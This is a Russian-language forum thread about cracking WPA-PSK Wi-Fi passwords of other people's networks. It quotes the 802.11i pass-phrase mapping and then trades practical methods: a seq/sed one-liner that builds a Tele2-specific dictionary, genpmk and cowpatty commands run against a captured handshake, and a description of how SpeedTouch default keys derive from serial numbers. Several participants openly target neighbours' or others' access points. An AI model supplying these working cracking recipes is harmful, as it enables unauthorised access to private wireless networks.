Итак, WPA2 регламентируется стандартом IEEE 802.11i-2004. Читаем приложение "H.4 Suggested pass-phrase-to-PSK mapping" к этому стандарту:
The pass-phrase mapping defined in this subclause uses the PBKDF2 method from PKCS .
PSK = PBKDF2(PassPhrase, ssid, ssidLength, 4096, 256)
Here, the following assumptions apply:

A pass-phrase is a sequence of [B]between 8 and 63 ASCII-encoded characters. The limit of 63 comes
from the desire to distinguish between a pass-phrase and a PSK displayed as 64 hexadecimal
characters.
Each character in the pass-phrase must have an encoding in the range of 32 to 126 (decimal),
inclusive.
ssid is the SSID of the ESS or IBSS where this pass-phrase is in use, encoded as an octet string used
in the Beacon and Probe Response frames for the ESS or IBSS.
ssidLength is the number of octets of the ssid.
4096 is the number of times the pass-phrase is hashed.
256 is the number of bits output by the pass-phrase mapping.

Т.е., чего мы имеем? Во-первых, пароль должен содержать от 8 до 63 АСКИ-символов, и во-вторых, символы эти должны быть из диапазона с 32-го по 126 десятичный номер в АСКИ-таблице. Для справки, 32-й - это пробел, 126-й - тильда. Никаких юникодов, и никаких национальных символов в паролях WPA-PSK быть не должно.
Там, правда, написано, что это рекомендованный способ мапинга пасс-фразы в ключ, но я не думаю, что кто-то из производителей рискнет сильно отклоняться от рекомендаций стандарта.

Кстати, только что обнаружил, что КУДА 2.2. уже доступна в паблике. Соответствнно, и крайний пирит можно из свн-ов собрать - вроде он там чуть пошустрее должен быть.

Такой вопрос: на инсталлированном BT4, airolib-ng сможет собрать базу хешей в файл превышающий 2 Гб ? Или тут есть нюансы?

Исходные данные:
есть handshake;
есть Wireshark;
есть online базы данных хэшей MD5 http://forum.antichat.ru/thread122734.html;

Вопрос:
что надо вытащить из handshake'a и скормить базам данных MD5
чтобы получить пароль ?

Спасибо.

Всем привет, решил поломать сетку защищенную WPA. ESSID ТД - Tele2. Это подразделение Orange. Известно, что часть пароля, которую генерирует прошивка это IX1V7[0000000...9999999]. Цифры в квадратных скобках как-то связаны с Station, т.е. это мак-адресс пользовательского компа, или как-то так. Причем оставшиеся 7 символов шестнадцатизнаки. Вот что хочу спросить у сообщества - в этом случае, когда есть часть кода, качать гигабайты словарей, думаю, это бессмыслено. Хочу создать свой словарь именно к этому ESSID-у. Но не знаю как лучше сделать.

Для visitante:
Слышал есть Rainbow таблицы, вроде бы вещь хорошая,
но что да как - надо копать.

Для visitante:
Слышал есть Rainbow таблицы, вроде бы вещь хорошая,
но что да как - надо копать.

таблица полностью 120 гиг
tkiptun-ng выход из ситуации с wpa/wpa2

Думаю смысла качать 120!!! гиг особого нету, т.к. пароль генерируется, исходя из данных каждого клиента индивидуально.
С Tele2 вроде как разобрался.
Ключ генерируется на основе "IX1V" данной последовательности. После V идет цифра года выпуска оборудования, т.е. если выпустили в этом (2009г.), получается IX1V9. Далее генерирую словарь seq -f %06.f 0 999999 | sed 's/.*/IX1VPV8&/'. Получается файл .txt в 23 мб. Ловите handshake. Потом все тревиально.
$ ./genpmk -f dic_tele2_08.txt -d tele2_08.dic -s Tele2
$ ./cowpatty -r captura.cap -d tele2_08.dic -s Tele2

В итоге получается что-то вроде The PSK is: [ IX1V8XXXXXX ]

Также вроде разобралися и с WLAN_XX, ADSLXXXX, JAZZTEL_XX, DLINKWIRESS, SpeedTouch.

Самое интересное на сегодня - точки доступа Livebox. Единственное в чем можно быть уверенным - что словарей для Livebox в нете НЕТ!!! На сайте www.crack-wpa.fr/ вроде продают их, но мне кажется что это развод. Думаю логичнее будет применить реверсивную инженерию к прошивке и узнать алгоритм генерации ключа.

Для visitante:
Пожалуйста про SpeedTouch поподробнее. Как у них генерируется ключь по твоему?
НУ и второй вопрос ( чтоб не париться) как советуешь сгенерировать словрь для этих " тварей"?

ХОТЯ У КАЖДОЙ ФИРМЫ СВОЙ ПОДХОД! но выслушаю внимательно!!!!

Ключ speedtouch генерируется на сонове серийного номера точки доступа. Предположим с. номер CP0510HG1LR.

CP -> Всегда одинаковый
05 -> Год выпуска
10 -> Неделя в году
HG -> Код продукции
1LR -> 3 случайные бита
Далее может идти код конфигурации 2 бита.
Всего 11 байт (13 с кодом конфигурации)
Начнем.
1. Отнимаем СР (первые два байта) и код продукции CP0510HG1LR. Получается 05101LR.
2. Последние 3 бита переводятся в шестнадцатизнаки. 05101LR. Получится что-то вроде 0510ХХХХХХ.
3. Теперь что получилось пропускаем через алгоритм SHA.
В итоге получается что-то вроде
742da831d2b657fa53d347301ec610e1ebf8a3d0.

Итого:
1. Последние 3 байта (6 в ascii) добавляются к слову "Speedtouch" для создания ESSIDa точки доступа. SpeedTouchF8A3D0

Для visitante:

Не приходилось ли сталкиваться с TP-LINK и AirLive ?

Для visitante:

Не приходилось ли сталкиваться с TP-LINK и AirLive ?

Нет, эти точки доступа мне не известны

Для visitante:
Жаль, они у меня под окном "гудят".

В итоге получается что-то вроде The PSK is: [ IX1V8XXXXXX ]
Как связать с паролем, который требует Windows для авторизации ?
Смущают первые 5 символов, они всегда постоянны для всех паролей ?

Для Diogen1954:

Почему жаль? Освойте дистрибуитив Backtrack. С помощью него Вы сможете подобрать ключик. Дело интересное и познавательное. Если это wep, то проблем быть не должно в принципе, тем более в этой ветке есть много информации.

Расшифруйте букво-сочетание PSK итогда Вам станет понятнее. Буква К означает ключ. Он симметричный, т.е. точка доступа и клиент имеют один ключ. А то, что я привел как пример это и есть ключ. Единственное, на чем могут быть проблемы, это с выбором кодировки. Но с этим я помочь, увы и ах, не могу - я аутсайдер систем майкрософт.

На счет первых пяти символов. Читайте сообщение от 21.11.2009, 13:14.

Спасибо за доброжелательное отношение. Это уже многого стоит.

Вот моя вершина, выше которой я не прыгну: BackTrack 4 на Asus Eee PC 901.
Handshake в кармане. Скорость перебора по словарю - 280 ключей в секунду. Под Windows такая же.

А выше я не поднимусь потому, что, как выражается Elcomsoft, в разумные отрезки
времени перебрать парольную фразу из 63 символов просто невозможно,
даже зная, что такое PSK. :-)

В городе, в котором я живу, не встречал точки защищённые протоколом WEP.
A WPA - не расшифровывается, то есть свою защитную функцию он выполняет.

Не верю в болтовню, что кто-то вычислил пароль WPA обладая такими
фундаментальными знаниями как PSK. Основание: точка и компьютер
обмениваются не паролями, а их хэшами. Алгоритм превращения
пароля в хэш не работает в обратном направлении.

Остаётся только перебор всех возможных комбинаций.

Для Diogen1954

У меня backtrack 3 и иписи 701. Скорость перебора зависит от процессора, а не от операционной системы. А Elcomsoft вы слушайте поменьше, им главное продать их поделие. Они говорят о скорости перебора пароля по словарю. Т.е. словарь должен быть уже сгенерирован. Чем больше информации о криптотектсе, тем больше параметров можно задать пригенерации словаря, тем самым уменьшая время перебора.
PSK это и есть ключ. А чем обмениваются компьютер и точка, хэшами или в явном виде, это и не важно.
Не знаю в каком городе вы живете, но сети, защищенные wep, составляют около 80%. Если не больше. И почему wpa не расшифровывается? Известен криптотекст, известен открытый текст (handshake), проведите криптоанализ. Перебор всех возможных комибанций... это действительно нереально.

Получается, что надо решить примерно такую задачу:
из мясорубки вылезает фарш, по фаршу восстановить исходный
кусок мяса.
А вот перебором зто возможно !
:-)
Самое главное - у меня в городе море бесплатного Интернета.
В центральной библиотеке даже розетки предусмотрены для
ноутбуков, электричество бесплатно. Нет ноутбука - бери
один из 30 компьютеров с операционками и офисными программами.
Бесплатно.
Зачем же мне пароль WPA ?
Хочется.......

Подскажите такую штуку, установлена карта:
D-link DWA-520 PCI
в BT4 в режиме монитора включается и работает, но при запуске aireplay-ng всё время выдает ошибку Input/output error, в какую сторону копать?

B BackTrack 4 Pre Release 1390 MB версия пакета Aircrack-ng НЕ ПОСЛЕДНЯЯ.
Возможно свежайшая заработает. Но использовать её с LiveUSB и LiveDVD не знаю как,
может только после инсталляции самого ВТ4 на что-нибудь "твёрдое".